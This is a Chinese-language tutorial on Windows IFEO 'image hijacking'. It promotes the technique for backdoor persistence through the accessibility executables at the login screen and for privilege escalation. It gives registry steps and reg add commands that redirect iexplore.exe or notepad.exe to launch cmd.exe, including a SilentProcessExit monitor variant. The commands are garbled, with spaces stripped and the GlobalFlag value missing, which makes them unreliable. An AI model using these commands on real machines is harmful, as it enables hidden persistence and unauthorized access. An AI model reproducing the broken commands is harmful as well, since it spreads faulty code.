一,什么是映像劫持(IFEO)?
所谓的IFEO就是ImageFileExecutionOptions,直译过来就是映像劫持。它又被称为“重定向劫持”(RedirectionHijack),它和“映像劫持”(ImageHijack,或IFEOHijack)只是称呼不同,实际上都是一样的技术手段。白话来讲就是做某个操作的时候被拦截下来,干了别的事。
相关实验推荐:数据流重定向
了解更多操作,上合天网安实验室!
二,映像劫持利用
1,后门持久化,可以实现系统在未登录状态下,通过快捷键运行自己的程序。(比如按5下shift出现的粘滞键Sethc.exe,还有Windows+U组合键时启动的utilman.exe程序)
更多如下
屏幕键盘:C:\Windows\System32\osk.exe放大镜:C:\Windows\System32\Magnify.exe旁白:C:\Windows\System32\Narrator.exe显示切换器C:\Windows\System32\DisplaySwitch.exe应用切换器:C:\Windows\System32\AtBroker.exe2,提权利用:比如拿到了数据库的root,sa权限也可以尝试一下映像劫持(有时候往往会出奇效)
3,欢迎各位补充。
三,实战操作
3.1劫持ie打开cmd
1.在注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions该注册表项建立一个子键,名字是你想劫持的程序,比如iexplore.exe(不用设置路径,这样设置后你系统里所有的名为iexplore.exe的可执行文件都会被劫持)
2.给刚加的子键添加一个字符串值(应该称为该子键的属性),名字为Debugger,值为你想运行起来的程序,比如cmd.exe(程序完整路径)
3.打开ie浏览器,这个时候会发现cmd启动了。
有一些病毒利用系统的这一特性,让运行杀毒软件程序的操作变成了再次执行病毒体,而一些病毒会在系统不同目录存在多个副本,利用映像劫持劫持不同的程序,指向不同的副本路径,这也是一些病毒被杀死进程删除单个病毒体后又能重新复活的原因之一。
也可以直接用命令:
regaddHKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\notepad.exe/vDebugger/tREG_SZ/dC:\WINDOWS\system32\cmd.exe
3.2劫持notepad在退出的时候打开cmd
在CurrentVersion注册一个GlobalFlag
在SilentProcessExit注册一个ReportingMode和一个MonitorProcess
最后在退出notepad的时候我们发现cmd启动了(此处省略动图,自行脑补)。直接上命令
regaddHKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\notepad.exe/vGlobalFlag/tREG_DWORD/d
regaddHKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SilentProcessExit\notepad.exe/vReportingMode/tREG_DWORD/d1
regaddHKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SilentProcessExit\notepad.exe/vMonitorProcess/dC:\Windows\System32\cmd.exe
Ps:reg命令请看参考(留言或私信获取链接)
